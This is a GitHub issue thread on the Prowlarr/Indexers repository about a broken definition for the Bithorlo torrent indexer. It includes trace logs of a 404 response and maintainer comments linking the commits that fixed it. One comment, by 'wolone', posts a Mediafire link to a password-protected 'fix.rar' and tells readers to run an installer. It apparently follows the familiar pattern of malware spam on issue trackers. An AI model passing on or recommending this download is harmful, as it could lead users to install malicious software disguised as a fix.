### ISSUE TITLE
[Bithorlo] Indexer changed, yaml definition outdated

### ISSUE THREAD

**Issue by rozgonik** [Prowlarr/Indexers#483]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

It seems like bithorlo has been updated its systems, and made the current definitions outdated/not working.

### Expected Behavior

Definition is up to date/indexer working.

### Environment

```markdown
- OS: all
- Prowlarr: all
- Docker Install: both
- Using Reverse Proxy: both
- Browser: all
```

### What branch are you running?

Master

### Trace Logs? **Not Optional**

```
[Trace] Cardigann: Cardigann (bithorlo): Parsing response 
[Trace] Cardigann: Unexpected Response content (1174 bytes): <!DOCTYPE html>
<html lang="hu">
	<head>
		<meta charset="UTF-8">
		<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">
		<link href="https://web-tech.dev/css/all.min.css" rel="stylesheet">
		<link rel="stylesheet" href="https://beta.bithorlo.info/public/main.css/bootstrap.min.css">
		<link rel="stylesheet" href="https://beta.bithorlo.info/public/main.css/1.css">
		<link rel="apple-touch-icon" sizes="180x180" href="https://beta.bithorlo.info/favicon/apple-touch-icon.png">
		<link rel="icon" type="image/png" sizes="32x32" href="https://beta.bithorlo.info/favicon/favicon-32x32.png">
		<link rel="icon" type="image/png" sizes="16x16" href="https://beta.bithorlo.info/favicon/favicon-16x16.png">
		<link rel="manifest" href="https://beta.bithorlo.info/favicon/site.webmanifest">
		
		<title>Bithorlo | 404-es hiba</title>
		
	</head>
	<body>
		<div class="alert alert-danger text-center container mt-2 mb-2">
			<strong>Hiba!</strong> A keresett oldal nem talĂĄlhatĂł a szerveren.<br><a href="https://beta.bithorlo.info/" class="btn btn-primary"><i class="fas fa-home"></i> VisszalĂŠpĂŠs a kezdĹlapra</a>
		</div>
	</body>
</html> 
[Warn] Cardigann: Unable to connect to indexer 

[v1.9.4.4039] NzbDrone.Core.Indexers.Exceptions.IndexerException: Unexpected response status NotFound code from indexer request
   at NzbDrone.Core.Indexers.Definitions.Cardigann.CardigannParser.ParseResponse(IndexerResponse indexerResponse) in ./Prowlarr.Core/Indexers/Definitions/Cardigann/CardigannParser.cs:line 58
   at NzbDrone.Core.Indexers.HttpIndexerBase`1.FetchPage(IndexerRequest request, IParseIndexerResponse parser) in ./Prowlarr.Core/Indexers/HttpIndexerBase.cs:line 514
   at NzbDrone.Core.Indexers.HttpIndexerBase`1.TestConnection() in ./Prowlarr.Core/Indexers/HttpIndexerBase.cs:line 671
RequestUri: https://www.bithorlo.info/browse.php?incldead=1&sort=4&type=desc;StatusCode: NotFound;ContentType: text/html; charset=utf-8;ContentLength: 1174;ContentSample: <!DOCTYPE html>
<html lang="hu">
	<head>
		<meta charset="UTF-8">
		<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">
		<link href="https://web-tech.dev/css/all.min.css" rel="stylesheet">
		<link rel="stylesheet" href="https://beta.bithorlo.info/public/main.css/bootstrap.min.css">
		<link rel="stylesheet" href="https://beta.bithorlo.info/public/main.css/1.css">
		<link rel="apple-touch-icon" sizes="180x180" href="https://beta.bithorlo.info/favicon/apple-touch-icon.png">
		<link rel="icon" type="image/png" sizes="32x32" href="https://beta.bithorlo.info/favicon/favicon-32x32.png">
		<link rel="icon" type="image/png" sizes="16x16" href="https://beta.bithorlo.info/favicon/favicon-16x16.png">
		<link rel="manifest" href="https://beta.bithorlo.info/favicon/site.webmanifest">
		
		<title>Bithorlo | 404-es hiba</title>
		
	</head>
	<body>
		<div class="alert alert-danger text-center container mt-2 mb-2">
			<strong>Hiba!</strong> A keresett oldal nem talĂĄlhatĂł a szerveren.<br><a href="https://beta.bithorlo.info/" class="btn btn-primary"><i class="fas fa-home"></i> VisszalĂŠpĂŠs a kezdĹlapra</a>
		</div>
	</body>
</html>

```

### Trace Logs have been provided as applicable. Reports will be closed if the required logs are not provided.

- [X] I have read and followed the steps in the wiki link above and provided the required trace logs - the logs contain `trace` - that are relevant and show this issue.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bakerboy448** [comment]
cc @ilike2burnthing @garfield69

**Comment by garfield69** [comment]
Ha! already working on it https://github.com/Jackett/Jackett/issues/15557 ;-)

**Comment by bakerboy448** [comment]
For posterity this is technically an invalid report

`- Prowlarr: all` there is no prowlarr version "all"

**Comment by garfield69** [comment]
https://github.com/Jackett/Jackett/commit/ac2738fee831708ad5c208181d39dad571d38e4a

**Comment by bakerboy448** [comment]
https://github.com/Prowlarr/Indexers/commit/39160b57809e42ad88d9562e26aee7625452878a
